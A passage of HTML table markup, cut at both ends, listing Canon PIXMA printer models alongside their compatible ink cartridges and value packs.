(Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6770</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA iX6870</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-750XL (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-755XXL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2570S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG2577S</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MG3570</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG3670</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MG7570</p></td><td width=\"208\"><p>CLI-751 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-751XL (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP160</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP170</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP180</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP228</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP237</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP245</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP258</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP276</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP287</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP460</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\"><p>PIXMA MP476</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP486</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP496</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP497</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP500</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP520</p></td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP530</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP568</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP600</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td 